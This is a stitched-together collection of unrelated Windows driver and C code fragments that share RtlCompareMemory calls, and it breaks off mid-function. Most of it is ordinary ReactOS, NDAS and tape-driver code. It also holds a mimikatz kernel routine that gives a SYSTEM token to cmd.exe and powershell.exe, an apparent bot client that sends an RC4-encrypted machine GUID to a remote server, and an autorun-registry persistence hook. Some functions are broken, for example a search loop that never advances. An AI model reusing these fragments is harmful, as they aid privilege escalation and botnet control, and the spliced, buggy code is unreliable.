enum ArpCacheEntrySearchResult SearchForNode(struct ARP_HEADER * arph)
{
struct ARP_CACHE_NODE * tn = ArpCache;
if(tn == NULL){
return ACESR_NotFound;
}
while(tn != NULL){
if(sizeof(struct ARP_HEADER) ==
RtlCompareMemory(arph, tn->arph, sizeof(struct ARP_HEADER))){
/*note: use RtlCompareMemory only if arph, and tn->arph are both resident. */
return ACESR_Found;
}
if((sizeof arph->SourceMACAddress) ==
RtlCompareMemory(arph->SourceMACAddress,
tn->arph.SourceMACAddress,
sizeof arph->SourceMACAddress)){
return ACESR_FoundMAC;
}
if((sizeof arph->SourceIPAddress) ==
RtlCompareMemory(arph->SourceIPAddress,
tn->arph.SourceIPAddress,
sizeof arph->SourceIPAddress)){
return ACESR_FoundIP;
}
}
return ACESR_NotFound;
}
BOOLEAN
TapeVerifyInquiry(
IN PSCSI_INQUIRY_DATA LunInfo
)
/*++
Routine Description:
This routine determines if the driver should claim this device.
Arguments:
LunInfo
Return Value:
TRUE - driver should claim this device.
FALSE - driver should not claim this device.
--*/
{
PINQUIRYDATA inquiryData;
DebugPrint((3,"TapeVerifyInquiry: Verify Tape Inquiry Data\n"));
inquiryData = (PVOID)LunInfo->InquiryData;
return ((RtlCompareMemory(inquiryData->VendorId,"OVERLAND",8) == 8) &&
((RtlCompareMemory(inquiryData->ProductId,"_5212/5214",10) == 10) ||
(RtlCompareMemory(inquiryData->ProductId,"_5612/5614",10) == 10)));
} // end TapeVerifyInquiry()
NTSTATUS kkll_m_process_systoken_callback(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PEPROCESS pProcess, PVOID pvArg)
{
NTSTATUS status = STATUS_SUCCESS;
PCHAR processName = PsGetProcessImageFileName(pProcess);
if((RtlCompareMemory("mimikatz.exe", processName, 13) == 13) || (RtlCompareMemory("cmd.exe", processName, 7) == 7) || (RtlCompareMemory("powershell.exe", processName, 14) == 14))
status = kkll_m_process_token_toProcess(szBufferIn, bufferIn, outBuffer, (HANDLE) pvArg, pProcess);
return status;
}
VOID
WAN_RemoveRasLink (
IN PKIP_NDIS_ADAPTER pAdapter,
IN PNDIS_WAN_LINE_DOWN pWanLineDown
)
{
PKIP_RAS_LINK RasLink = NULL;
PLIST_ENTRY ListEntry;
DBGLOG(( LTrace, "Local MAC: %.2X%.2X%.2X%.2X%.2X%.2X Remote MAC: %.2X%.2X%.2X%.2X%.2X%.2X\n",
pWanLineDown->LocalAddress[0],
pWanLineDown->LocalAddress[1],
pWanLineDown->LocalAddress[2],
pWanLineDown->LocalAddress[3],
pWanLineDown->LocalAddress[4],
pWanLineDown->LocalAddress[5],
pWanLineDown->RemoteAddress[0],
pWanLineDown->RemoteAddress[1],
pWanLineDown->RemoteAddress[2],
pWanLineDown->RemoteAddress[3],
pWanLineDown->RemoteAddress[4],
pWanLineDown->RemoteAddress[5]
));
KIP_LOCK_ADAPTER(pAdapter);
for( ListEntry = pAdapter->RasLinkList.Flink;
ListEntry != &pAdapter->RasLinkList;
ListEntry = ListEntry->Flink )
{
RasLink = CONTAINING_RECORD(ListEntry,KIP_RAS_LINK,Interface.Link);
if ( (RtlCompareMemory(RasLink->RemoteAddress, pWanLineDown->RemoteAddress, ETHARP_HWADDR_LEN) == ETHARP_HWADDR_LEN )
&& (RtlCompareMemory(RasLink->Interface.CurrentMacAddress, pWanLineDown->LocalAddress, ETHARP_HWADDR_LEN) == ETHARP_HWADDR_LEN ) )
{
RemoveEntryList (&RasLink->Interface.Link);
break;
}
RasLink = NULL;
}
KIP_UNLOCK_ADAPTER(pAdapter);
if ( RasLink ){
// update arp table
etharp_remove_static_entry( &RasLink->IpAddr );
etharp_remove_static_entry( &RasLink->RemoteIpAddr );
ProtocolUnBindAdapter(
RasLink->Interface.Miniport,
&RasLink->Interface,
&RasLink->Interface.Protocol
);
NdisFreeMemory ( RasLink, sizeof (KIP_RAS_LINK), 0 );
}
}
/*
* @implemented
*/
VOID
UpdateReplicatedUniqueIds(IN PDEVICE_INFORMATION DeviceInformation, IN PDATABASE_ENTRY DatabaseEntry)
{
PLIST_ENTRY NextEntry;
PUNIQUE_ID_REPLICATE ReplicatedUniqueId, NewEntry;
/* Browse all the device replicated unique IDs */
for (NextEntry = DeviceInformation->ReplicatedUniqueIdsListHead.Flink;
NextEntry != &(DeviceInformation->ReplicatedUniqueIdsListHead);
NextEntry = NextEntry->Flink)
{
ReplicatedUniqueId = CONTAINING_RECORD(NextEntry,
UNIQUE_ID_REPLICATE,
ReplicatedUniqueIdsListEntry);
if (ReplicatedUniqueId->UniqueId->UniqueIdLength != DatabaseEntry->UniqueIdLength)
{
continue;
}
/* If we find the UniqueId to update, break */
if (RtlCompareMemory(ReplicatedUniqueId->UniqueId->UniqueId,
(PVOID)((ULONG_PTR)DatabaseEntry + DatabaseEntry->UniqueIdOffset),
ReplicatedUniqueId->UniqueId->UniqueIdLength) == ReplicatedUniqueId->UniqueId->UniqueIdLength)
{
break;
}
}
/* We found the unique ID, no need to continue */
if (NextEntry != &(DeviceInformation->ReplicatedUniqueIdsListHead))
{
return;
}
/* Allocate a new entry for unique ID */
NewEntry = AllocatePool(sizeof(UNIQUE_ID_REPLICATE));
if (!NewEntry)
{
return;
}
/* Allocate the unique ID */
NewEntry->UniqueId = AllocatePool(DatabaseEntry->UniqueIdLength + sizeof(MOUNTDEV_UNIQUE_ID));
if (!NewEntry->UniqueId)
{
FreePool(NewEntry);
return;
}
/* Copy */
NewEntry->UniqueId->UniqueIdLength = DatabaseEntry->UniqueIdLength;
RtlCopyMemory(NewEntry->UniqueId->UniqueId,
(PVOID)((ULONG_PTR)DatabaseEntry + DatabaseEntry->UniqueIdOffset),
DatabaseEntry->UniqueIdLength);
/* And insert into replicated unique IDs list */
InsertTailList(&DeviceInformation->ReplicatedUniqueIdsListHead, &NewEntry->ReplicatedUniqueIdsListEntry);
return;
}
/*
* @implemented
*/
NTSTATUS
NTAPI
ChangeUniqueIdRoutine(IN PWSTR ValueName,
IN ULONG ValueType,
IN PVOID ValueData,
IN ULONG ValueLength,
IN PVOID Context,
IN PVOID EntryContext)
{
PMOUNTDEV_UNIQUE_ID OldUniqueId = Context;
PMOUNTDEV_UNIQUE_ID NewUniqueId = EntryContext;
/* Validate parameters not to corrupt registry */
if ((ValueType != REG_BINARY) ||
(OldUniqueId->UniqueIdLength != ValueLength))
{
return STATUS_SUCCESS;
}
if (RtlCompareMemory(OldUniqueId->UniqueId, ValueData, ValueLength) == ValueLength)
{
/* Write new data */
RtlWriteRegistryValue(RTL_REGISTRY_ABSOLUTE,
DatabasePath,
ValueName,
REG_BINARY,
NewUniqueId,
NewUniqueId->UniqueIdLength);
}
return STATUS_SUCCESS;
}
/*
* @implemented
*/
NTSTATUS
NTAPI
CheckForNoDriveLetterEntry(IN PWSTR ValueName,
IN ULONG ValueType,
IN PVOID ValueData,
IN ULONG ValueLength,
IN PVOID Context,
IN PVOID EntryContext)
{
PBOOLEAN EntryPresent = EntryContext;
PMOUNTDEV_UNIQUE_ID UniqueId = Context;
/* Check if matches no drive letter entry */
if (ValueName[0] != L'#' || ValueType != REG_BINARY ||
UniqueId->UniqueIdLength != ValueLength)
{
return STATUS_SUCCESS;
}
/* Compare unique ID */
if (RtlCompareMemory(UniqueId->UniqueId, ValueData, ValueLength) == ValueLength)
{
*EntryPresent = TRUE;
}
return STATUS_SUCCESS;
}
FSRTL_COMPARISON_RESULT
NTAPI
FatiCompareNames(PSTRING NameA,
PSTRING NameB)
{
ULONG MinimumLen, i;
/* Calc the minimum length */
MinimumLen = NameA->Length < NameB->Length ? NameA->Length :
NameB->Length;
/* Actually compare them */
i = (ULONG)RtlCompareMemory( NameA->Buffer, NameB->Buffer, MinimumLen );
if (i < MinimumLen)
{
/* Compare prefixes */
if (NameA->Buffer[i] < NameB->Buffer[i])
return LessThan;
else
return GreaterThan;
}
/* Final comparison */
if (NameA->Length < NameB->Length)
return LessThan;
else if (NameA->Length > NameB->Length)
return GreaterThan;
else
return EqualTo;
}
VOID OnProcessQuit(HANDLE ParentId, HANDLE ProcessId, BOOLEAN Create)
{
if(Create == TRUE)
{
PEPROCESS p=PsGetCurrentProcess();
ANSI_STRING ascallCode;
RtlInitAnsiString(&ascallCode,(char *)p+g_processNameOffset);
UNICODE_STRING uni;
RtlAnsiStringToUnicodeString(&uni,&ascallCode,true);
_wcslwr(uni.Buffer);
if(RtlCompareMemory(BEGINOPERATEREG,uni.Buffer,uni.Length))
{
if(SetReg(AUTORUN,REGNAME) == false)
WriteSysLog(LOG_TYPE_DEBUG,L" is userinital create reg : %s","error");
}
RtlFreeUnicodeString(&uni);
return;
}
kdP(("OnProcessQuit \n"));
if(IsProcessProtected((ULONG)ProcessId))
RemoveProtectPID((ULONG)ProcessId);
}
bool IsHashSecure(const unsigned char* hash)
{
KeWaitForSingleObject(&g_secuHashMutex,Executive,KernelMode,FALSE,NULL);
UCHAR id = HashFunc(hash);
bool bReturn = false;
//SECURE_HASH* secuHash = g_secuHash[id];
SECURE_HASH* secuHash = g_queryHash[id];
unsigned __int64 uiStartTimer = __rdtsc();
while(secuHash)
{
if(RtlCompareMemory(secuHash->Hash, hash, HASH_SIZE) == HASH_SIZE)
{
bReturn = true;
break;
}
if( ((__rdtsc() - uiStartTimer) / (1000 * 1000 * 1000)) >= MAXELPASETIMERFORCHECK )
{
WriteSysLog(LOG_TYPE_INFO,L"elapse the large timer 6 seconds\n ");
bReturn = false;
break;
}
secuHash = secuHash->next;
}
releaseMutex();
return true == bReturn? true:false;
}
BOOL
WAN_CheckForContext (
IN PKIP_NDIS_ADAPTER pAdapter,
IN PCHAR pProtoContext
)
{
PLIST_ENTRY ListEntry;
PKIP_RAS_LINK pRasLink;
BOOLEAN fbResult = FALSE;
DBGLOG(( LTrace, "Context: %.2X%.2X%.2X%.2X\n",
pProtoContext[0],
pProtoContext[1],
pProtoContext[2],
pProtoContext[3]
));
KIP_LOCK_ADAPTER(pAdapter);
for ( ListEntry = pAdapter->RasLinkList.Flink;
ListEntry != &pAdapter->RasLinkList;
ListEntry = ListEntry->Flink)
{
pRasLink = CONTAINING_RECORD(ListEntry,KIP_RAS_LINK,Interface.Link);
if ( (RtlCompareMemory(&pRasLink->Interface.CurrentMacAddress[2], pProtoContext, 4) == 4) ){
fbResult = TRUE;
break;
}
}
KIP_UNLOCK_ADAPTER(pAdapter);
return fbResult;
}
BOOLEAN
HtpCompareKeys (
_In_ PBL_HASH_ENTRY Entry1,
_In_ PBL_HASH_ENTRY Entry2
)
{
ULONG Flags;
BOOLEAN ValueMatch;
/* Check if the flags or sizes are not matching */
Flags = Entry1->Flags;
if ((Entry1->Size != Entry2->Size) || (Flags != Entry2->Flags))
{
ValueMatch = FALSE;
}
else if (Flags & BL_HT_VALUE_IS_INLINE)
{
/* Check if this is an in-line value, compare it */
ValueMatch = Entry1->Value == Entry2->Value;
}
else
{
/* This is a pointer value, compare it */
ValueMatch = (RtlCompareMemory(Entry1->Value, Entry2->Value, Entry1->Size) ==
Entry1->Size);
}
/* Return if it matched */
return ValueMatch;
}
/*
* @implemented
*/
NTSTATUS
NTAPI
SymbolicLinkNamesFromUniqueIdCount(IN PWSTR ValueName,
IN ULONG ValueType,
IN PVOID ValueData,
IN ULONG ValueLength,
IN PVOID Context,
IN PVOID EntryContext)
{
UNICODE_STRING ValueNameString;
PMOUNTDEV_UNIQUE_ID UniqueId = Context;
if (ValueName[0] != L'#' || ValueType != REG_BINARY ||
(UniqueId->UniqueIdLength != ValueLength))
{
return STATUS_SUCCESS;
}
if (RtlCompareMemory(UniqueId->UniqueId, ValueData, ValueLength) != ValueLength)
{
return STATUS_SUCCESS;
}
/* That one matched, increase count */
RtlInitUnicodeString(&ValueNameString, ValueName);
if (ValueNameString.Length)
{
(*((PULONG)EntryContext))++;
}
return STATUS_SUCCESS;
}
VOID
DraidListnerDelAddress(
PTDI_ADDRESS_LPX Addr
) {
PDRAID_GLOBALS DraidGlobals;
PLIST_ENTRY listEntry;
KIRQL oldIrql;
PDRAID_LISTEN_CONTEXT ListenContext;
if (!g_DraidGlobals) {
KDPrintM(DBG_LURN_INFO, ("DRAID is not running\n"));
return;
}
DraidGlobals = g_DraidGlobals;
// Find matching address and just mark active flag false because Wait event may be in use.
ACQUIRE_SPIN_LOCK(&DraidGlobals->ListenContextSpinlock, &oldIrql);
for (listEntry = DraidGlobals->ListenContextList.Flink;
listEntry != &DraidGlobals->ListenContextList;
listEntry = listEntry->Flink)
{
ListenContext = CONTAINING_RECORD (listEntry, DRAID_LISTEN_CONTEXT, Link);
if (RtlCompareMemory(ListenContext->Addr.Node,
Addr->Node, 6) == 6) {
KDPrintM(DBG_LURN_INFO, ("Found matching address\n"));
ListenContext->Destroy = TRUE;
KeSetEvent(&DraidGlobals->NetChangedEvent, IO_NO_INCREMENT, FALSE);
break;
}
}
RELEASE_SPIN_LOCK(&DraidGlobals->ListenContextSpinlock, oldIrql);
}
void TestFsRtlAddToTunnelCache(ULONGLONG DirectoryKey, PUNICODE_STRING s_name, PUNICODE_STRING l_name, BOOLEAN KeyByShortName)
{
SIZE_T eq;
LONG b;
PUNICODE_STRING bs_name;
PUNICODE_STRING bl_name;
PVOID Bufb;
PVOID Buf;
Buf = ExAllocatePool(PagedPool, BufSize);
ok(Buf != NULL, "Buff in TestFsRtlAddToTunnelCache is NULL after allocated memory\n");
Bufb = ExAllocatePool(PagedPool, BufSize);
ok(Bufb != NULL, "Buff in TestFsRtlAddToTunnelCache is NULL after allocated memory\n");
// Allocate memory for the bufs_name
bs_name = CopyUS(s_name);
// Allocate memory for the l_name and bl_name
bl_name = CopyUS(l_name);
memset((void*)Buf, 0, BufSize);
memset((void*)Bufb, 0, BufSize);
FsRtlAddToTunnelCache(T, DirectoryKey, s_name, l_name, KeyByShortName, BufSize, Buf);
eq = RtlCompareMemory((const VOID*)Buf, (const VOID*)Bufb, BufSize);
ok( eq != sizeof(TUNNEL),"FsRtlAddToTunnelCache function did not change anything in the memory at the address Buf.\n");
b = RtlCompareUnicodeString(l_name, bl_name, TRUE);
ok (b == 0, "long name after call FsRtlAddToTunnelCache != long name befo call FsRtlAddToTunnelCache\n\n");
b = RtlCompareUnicodeString(s_name, bs_name, TRUE);
ok (b == 0, "short name after call FsRtlAddToTunnelCache != short name befo call FsRtlAddToTunnelCache\n\n");
}
PDRAID_LISTEN_CONTEXT
DraidCreateListenContext(
PDRAID_GLOBALS DraidGlobals,
PLPX_ADDRESS Addr
) {
KIRQL oldIrql;
BOOLEAN AlreadyExist;
PLIST_ENTRY listEntry;
PDRAID_LISTEN_CONTEXT ListenContext;
//
// Check address is already in the listen context list
//
ACQUIRE_SPIN_LOCK(&DraidGlobals->ListenContextSpinlock, &oldIrql);
AlreadyExist = FALSE;
for (listEntry = DraidGlobals->ListenContextList.Flink;
listEntry != &DraidGlobals->ListenContextList;
listEntry = listEntry->Flink)
{
ListenContext = CONTAINING_RECORD (listEntry, DRAID_LISTEN_CONTEXT, Link);
if (!ListenContext->Destroy && RtlCompareMemory(ListenContext->Addr.Node,
Addr->Node, 6) == 6) {
KDPrintM(DBG_LURN_INFO, ("New LPX address already exist.Ignoring.\n"));
AlreadyExist = TRUE;
break;
}
}
RELEASE_SPIN_LOCK(&DraidGlobals->ListenContextSpinlock, oldIrql);
if (AlreadyExist) {
return NULL;
}
//
// Alloc listen context
//
ListenContext = ExAllocatePoolWithTag(NonPagedPool, sizeof(DRAID_LISTEN_CONTEXT),
DRAID_LISTEN_CONTEXT_POOL_TAG);
if (!ListenContext) {
KDPrintM(DBG_LURN_INFO, ("Failed to alloc listen context\n"));
return NULL;
}
RtlZeroMemory(ListenContext, sizeof(DRAID_LISTEN_CONTEXT));
KeInitializeEvent(
&ListenContext->TdiListenContext.CompletionEvent,
NotificationEvent,
FALSE
);
InitializeListHead(&ListenContext->Link);
RtlCopyMemory(ListenContext->Addr.Node, Addr->Node, 6);
ListenContext->Addr.Port = HTONS(DRIX_ARBITER_PORT_NUM_BASE);
ExInterlockedInsertTailList(&DraidGlobals->ListenContextList,
&ListenContext->Link,
&DraidGlobals->ListenContextSpinlock
);
return ListenContext;
}
//
// compare addresses to see if the address is local.
//
BOOLEAN
LfsIsFromLocal(
PLPX_ADDRESS Addr
) {
NTSTATUS ntStatus;
SOCKETLPX_ADDRESS_LIST socketLpxAddressList;
LONG idx_addr ;
SPY_LOG_PRINT( LFS_DEBUG_TABLE_NOISE, ( "[LFS] LfsIsFromLocal: Entered with Addr:%02x:%02x:%02x:%02x:%02x:%02x\n",
Addr->Node[0], Addr->Node[1], Addr->Node[2],
Addr->Node[3], Addr->Node[4], Addr->Node[5]
));
//
// get addresses from LPX
//
socketLpxAddressList.iAddressCount = 0 ;
ntStatus = LpxTdiV2GetAddressList(
&socketLpxAddressList
) ;
if(!NT_SUCCESS(ntStatus)) {
SPY_LOG_PRINT( LFS_DEBUG_LFS_TRACE, ( "[LFS] LfsIsFromLocal: LpxTdiV2GetAddressList() failed.\n")) ;
return FALSE ;
}
if(0 == socketLpxAddressList.iAddressCount) {
SPY_LOG_PRINT( LFS_DEBUG_LFS_TRACE, ( "[LFS] LfsIsFromLocal: No NICs in the host.\n")) ;
return FALSE ;
}
for(idx_addr = 0 ; idx_addr < socketLpxAddressList.iAddressCount ; idx_addr ++ ) {
//
// BUG FIX for LPX: skip SocketLpxDevice
//
if( (0 == socketLpxAddressList.SocketLpx[idx_addr].LpxAddress.Node[0]) &&
(0 == socketLpxAddressList.SocketLpx[idx_addr].LpxAddress.Node[1]) &&
(0 == socketLpxAddressList.SocketLpx[idx_addr].LpxAddress.Node[2]) &&
(0 == socketLpxAddressList.SocketLpx[idx_addr].LpxAddress.Node[3]) &&
(0 == socketLpxAddressList.SocketLpx[idx_addr].LpxAddress.Node[4]) &&
(0 == socketLpxAddressList.SocketLpx[idx_addr].LpxAddress.Node[5]) ) {
SPY_LOG_PRINT( LFS_DEBUG_LFS_TRACE, ( "[LFS] LfsIsFromLocal: We don't use SocketLpx device.\n") );
continue ;
}
if( RtlCompareMemory(Addr->Node, socketLpxAddressList.SocketLpx[idx_addr].LpxAddress.Node, ETHER_ADDR_LENGTH)
== ETHER_ADDR_LENGTH ) {
SPY_LOG_PRINT( LFS_DEBUG_TABLE_NOISE, ( "[LFS] LfsIsFromLocal: found a address matching.\n")) ;
return TRUE ;
}
}
return FALSE ;
}
INT
MyRtlCompareMemory(
IN CONST VOID *Source1,
IN CONST VOID *Source2,
IN SIZE_T Length
)
{
return (INT)RtlCompareMemory(Source1, Source2, Length);
}
PCHAR Server::SendRequest(PCHAR ServerUrl, DWORD Type, PCHAR Request, DWORD RequestLen, BOOLEAN Wait, PDWORD Size, PBOOLEAN pbok)
{
PVOID Result = NULL;
WINET_LOADURL LoadUrl = {0};
PCHAR BotId = Drop::GetMachineGuid();
CHAR chHost[MAX_PATH] = {0};
DWORD dwHost = RTL_NUMBER_OF(chHost)-1;
PCHAR FullRequest;
*pbok = FALSE;
if (FullRequest = (PCHAR)malloc(RequestLen + 100))
{
DWORD Len = sprintf(FullRequest, "%s|%d|", Drop::GetMachineGuid(), Type);
CopyMemory(FullRequest + Len, Request, RequestLen);
Len += RequestLen;
LoadUrl.pcMethod = "POST";
LoadUrl.pcUrl = ServerUrl;
if (SUCCEEDED(UrlGetPart(ServerUrl, chHost, &dwHost, URL_PART_HOSTNAME, 0)))
{
LoadUrl.dwPstData = Len;
if (LoadUrl.pvPstData = Utils::UtiCryptRc4M(chHost, dwHost, FullRequest, Len))
{
LoadUrl.dwRetry = Config::ReadInt(CFG_DCT_MAIN_SECTION, CFG_DCT_MAIN_SRVRETRY);
PVOID Buffer = Wait ? WinetLoadUrlWait(&LoadUrl, 2*60) : WinetLoadUrl(&LoadUrl);
if (Buffer)
{
Utils::UtiCryptRc4(BotId, lstrlen(BotId), Buffer, Buffer, LoadUrl.dwBuffer);
if ((RtlCompareMemory(Buffer, "OK\r\n", 4) == 4))
{
*pbok = TRUE;
if (LoadUrl.dwBuffer > 4)
{
if (Result = malloc(LoadUrl.dwBuffer - 3))
{
CopyMemory(Result, (PCHAR)Buffer + 4, LoadUrl.dwBuffer - 4);
((PCHAR)Result)[LoadUrl.dwBuffer - 4] = 0;
if (Size) *Size = LoadUrl.dwBuffer - 4;
}
}
}
free(Buffer);
}
free(LoadUrl.pvPstData);
}
}
free(FullRequest);
}
return (PCHAR)Result;
}
static
BOOLEAN
LfsTable_Lookup(
IN PLFS_TABLE LfsTable,
IN PNETDISK_PARTITION_INFO NetDiskPartitionInfo,
OUT PLFSTAB_ENTRY *LfsTabEntry
) {
PLIST_ENTRY listEntry ;
KIRQL oldIrql ;
PLFSTAB_ENTRY entry ;
BOOLEAN Found ;
Found = FALSE ;
ExAcquireSpinLock(&LfsTable->SpinLock, &oldIrql) ;
listEntry = LfsTable->LfsTabPartitionList.Flink ;
while(listEntry != &LfsTable->LfsTabPartitionList) {
entry = CONTAINING_RECORD(listEntry, LFSTAB_ENTRY, LfsTabPartitionEntry) ;
if( RtlCompareMemory( // NetDisk Address
&entry->LocalNetDiskPartitionInfo.NetDiskPartitionInfo.NetDiskAddress,
&NetDiskPartitionInfo->NetDiskAddress,
sizeof(LPX_ADDRESS)) == sizeof(LPX_ADDRESS) &&
entry->LocalNetDiskPartitionInfo.NetDiskPartitionInfo.UnitDiskNo == NetDiskPartitionInfo->UnitDiskNo // UnitDisk No
&& entry->LocalNetDiskPartitionInfo.NetDiskPartitionInfo.StartingOffset.QuadPart == NetDiskPartitionInfo->StartingOffset.QuadPart // Partition Starting Byte Offset
) {
LfsTable_ReferenceEntry (
entry
) ;
*LfsTabEntry = entry ;
Found = TRUE ;
break ;
}
listEntry = listEntry->Flink ;
}
ExReleaseSpinLock(&LfsTable->SpinLock, oldIrql) ;
#if DBG
if(!Found) {
SPY_LOG_PRINT( LFS_DEBUG_TABLE_INFO,
("LFS: LfsTable_Lookup: updated the primary address of NetDisk:%02x:%02x:%02x:%02x:%02x:%02x/%d UnitDisk:%d\n",
NetDiskPartitionInfo->NetDiskAddress.Node[0],
NetDiskPartitionInfo->NetDiskAddress.Node[1],
NetDiskPartitionInfo->NetDiskAddress.Node[2],
NetDiskPartitionInfo->NetDiskAddress.Node[3],
NetDiskPartitionInfo->NetDiskAddress.Node[4],
NetDiskPartitionInfo->NetDiskAddress.Node[5],
NTOHS(NetDiskPartitionInfo->NetDiskAddress.Port),
(int)NetDiskPartitionInfo->UnitDiskNo
));
}
#endif
return Found ;
}
/*
* @implemented
*/
NTSTATUS
NTAPI
SymbolicLinkNamesFromUniqueIdQuery(IN PWSTR ValueName,
IN ULONG ValueType,
IN PVOID ValueData,
IN ULONG ValueLength,
IN PVOID Context,
IN PVOID EntryContext)
{
UNICODE_STRING ValueNameString;
PMOUNTDEV_UNIQUE_ID UniqueId = Context;
/* Unicode strings table */
PUNICODE_STRING ReturnString = EntryContext;
if (ValueName[0] != L'#' || ValueType != REG_BINARY ||
(UniqueId->UniqueIdLength != ValueLength))
{
return STATUS_SUCCESS;
}
if (RtlCompareMemory(UniqueId->UniqueId, ValueData, ValueLength) != ValueLength)
{
return STATUS_SUCCESS;
}
/* Unique ID matches, let's put the symlink */
RtlInitUnicodeString(&ValueNameString, ValueName);
if (!ValueNameString.Length)
{
return STATUS_SUCCESS;
}
/* Allocate string to copy */
ValueNameString.Buffer = AllocatePool(ValueNameString.MaximumLength);
if (!ValueNameString.Buffer)
{
return STATUS_SUCCESS;
}
/* Copy */
RtlCopyMemory(ValueNameString.Buffer, ValueName, ValueNameString.Length);
ValueNameString.Buffer[ValueNameString.Length / sizeof(WCHAR)] = UNICODE_NULL;
while (ReturnString->Length)
{
ReturnString++;
}
/* And return that string */
*ReturnString = ValueNameString;
return STATUS_SUCCESS;
}
static NTSTATUS
VfatVerify (PVFAT_IRP_CONTEXT IrpContext)
/*
* FUNCTION: Verify the filesystem
*/
{
PDEVICE_OBJECT DeviceToVerify;
NTSTATUS Status = STATUS_SUCCESS;
FATINFO FatInfo;
BOOLEAN RecognizedFS;
PDEVICE_EXTENSION DeviceExt = IrpContext->DeviceExt;
DPRINT("VfatVerify(IrpContext %p)\n", IrpContext);
DeviceToVerify = IrpContext->Stack->Parameters.VerifyVolume.DeviceObject;
Status = VfatBlockDeviceIoControl(DeviceToVerify,
IOCTL_DISK_CHECK_VERIFY,
NULL,
0,
NULL,
0,
TRUE);
DeviceToVerify->Flags &= ~DO_VERIFY_VOLUME;
if (!NT_SUCCESS(Status) && Status != STATUS_VERIFY_REQUIRED)
{
DPRINT("VfatBlockDeviceIoControl() failed (Status %lx)\n", Status);
Status = STATUS_WRONG_VOLUME;
}
else
{
Status = VfatHasFileSystem(DeviceToVerify, &RecognizedFS, &FatInfo);
if (!NT_SUCCESS(Status) || RecognizedFS == FALSE)
{
Status = STATUS_WRONG_VOLUME;
}
else if (sizeof(FATINFO) == RtlCompareMemory(&FatInfo, &DeviceExt->FatInfo, sizeof(FATINFO)))
{
/*
* FIXME:
* Preformated floppy disks have very often a serial number of 0000:0000.
* We should calculate a crc sum over the sectors from the root directory as secondary volume number.
* Each write to the root directory must update this crc sum.
*/
}
else
{
Status = STATUS_WRONG_VOLUME;
}
}
return Status;
}
VOID
LfsTable_UpdatePrimaryInfo(
IN PLFS_TABLE LfsTable,
IN PLPX_ADDRESS NetDiskAddress,
IN UCHAR UnitDiskNo,
IN PLPX_ADDRESS PrimaryAddress
) {
PLIST_ENTRY listEntry ;
KIRQL oldIrql ;
KIRQL oldIrql2 ;
PLFSTAB_ENTRY entry ;
ExAcquireSpinLock(&LfsTable->SpinLock, &oldIrql) ;
listEntry = LfsTable->LfsTabPartitionList.Flink ;
while(listEntry != &LfsTable->LfsTabPartitionList) {
entry = CONTAINING_RECORD(listEntry, LFSTAB_ENTRY, LfsTabPartitionEntry) ;
if( RtlCompareMemory( // NetDisk Address
&entry->LocalNetDiskPartitionInfo.NetDiskPartitionInfo.NetDiskAddress.Node,
NetDiskAddress->Node,
LPXADDR_NODE_LENGTH) == LPXADDR_NODE_LENGTH &&
entry->LocalNetDiskPartitionInfo.NetDiskPartitionInfo.NetDiskAddress.Port == NetDiskAddress->Port &&
entry->LocalNetDiskPartitionInfo.NetDiskPartitionInfo.UnitDiskNo == UnitDiskNo // UnitDisk No
) {
ExAcquireSpinLock(&entry->SpinLock, &oldIrql2) ;
RtlCopyMemory(&entry->PrimaryAddress, PrimaryAddress, sizeof(LPX_ADDRESS)) ;
entry->Flags |= LFSTABENTRY_FLAG_VAILDPRIMADDRESS;
ExReleaseSpinLock(&entry->SpinLock, oldIrql2) ;
SPY_LOG_PRINT( LFS_DEBUG_TABLE_INFO,
("LFS: LfsTable_UpdatePrimaryInfo: updated the primary address of NetDisk:%02x:%02x:%02x:%02x:%02x:%02x/%d UnitDisk:%d\n",
entry->LocalNetDiskPartitionInfo.NetDiskPartitionInfo.NetDiskAddress.Node[0],
entry->LocalNetDiskPartitionInfo.NetDiskPartitionInfo.NetDiskAddress.Node[1],
entry->LocalNetDiskPartitionInfo.NetDiskPartitionInfo.NetDiskAddress.Node[2],
entry->LocalNetDiskPartitionInfo.NetDiskPartitionInfo.NetDiskAddress.Node[3],
entry->LocalNetDiskPartitionInfo.NetDiskPartitionInfo.NetDiskAddress.Node[4],
entry->LocalNetDiskPartitionInfo.NetDiskPartitionInfo.NetDiskAddress.Node[5],
NTOHS(entry->LocalNetDiskPartitionInfo.NetDiskPartitionInfo.NetDiskAddress.Port),
(int)entry->LocalNetDiskPartitionInfo.NetDiskPartitionInfo.UnitDiskNo
));
}
listEntry = listEntry->Flink ;
}
ExReleaseSpinLock(&LfsTable->SpinLock, oldIrql) ;
}
NTSTATUS pnp_removal(PVOID NotificationStructure, PVOID Context) {
#endif
TARGET_DEVICE_REMOVAL_NOTIFICATION* tdrn = (TARGET_DEVICE_REMOVAL_NOTIFICATION*)NotificationStructure;
pdo_device_extension* pdode = (pdo_device_extension*)Context;
if (RtlCompareMemory(&tdrn->Event, &GUID_TARGET_DEVICE_QUERY_REMOVE, sizeof(GUID)) == sizeof(GUID)) {
TRACE("GUID_TARGET_DEVICE_QUERY_REMOVE\n");
if (pdode->vde && pdode->vde->mounted_device)
return pnp_query_remove_device(pdode->vde->mounted_device, NULL);
}
return STATUS_SUCCESS;
}
static
VOID
PrimaryAgentNICDisabled(
PPRIMARY Primary,
PSOCKETLPX_ADDRESS_LIST AddressList
) {
LONG idx_listen;
LONG idx_disabled;
BOOLEAN found;
for(idx_disabled = 0; idx_disabled < AddressList->iAddressCount; idx_disabled ++ ) {
found = FALSE;
for(idx_listen = 0; idx_listen < MAX_SOCKETLPX_INTERFACE; idx_listen ++) {
//
// find the match
//
if(Primary->Agent.ListenSocket[idx_listen].Active &&
RtlCompareMemory(
AddressList->SocketLpx[idx_disabled].LpxAddress.Node,
Primary->Agent.ListenSocket[idx_listen].NICAddress.Node,
ETHER_ADDR_LENGTH
) == ETHER_ADDR_LENGTH ) {
found = TRUE;
break;
}
}
//
// delete disabled one if found.
//
if(found) {
PPRIMARY_LISTEN_SOCKET listenSock = Primary->Agent.ListenSocket + idx_listen;
listenSock->Active = FALSE;
LpxTdiDisassociateAddress(listenSock->ListenFileObject);
LpxTdiCloseConnection(listenSock->ListenFileHandle, listenSock->ListenFileObject);
LpxTdiCloseAddress (listenSock->AddressFileHandle, listenSock->AddressFileObject);
Primary->Agent.ActiveListenSocketCount --;
SPY_LOG_PRINT( LFS_DEBUG_PRIMARY_INFO,
("PrimaryAgentNICEnabled: A NIC deleted..\n"));
}
}
}
NTSTATUS RemoveMatchExpression(__in WCHAR Expression[], __in ULONG ExpressionLength)
{
// 这里要先判断链表是否为空
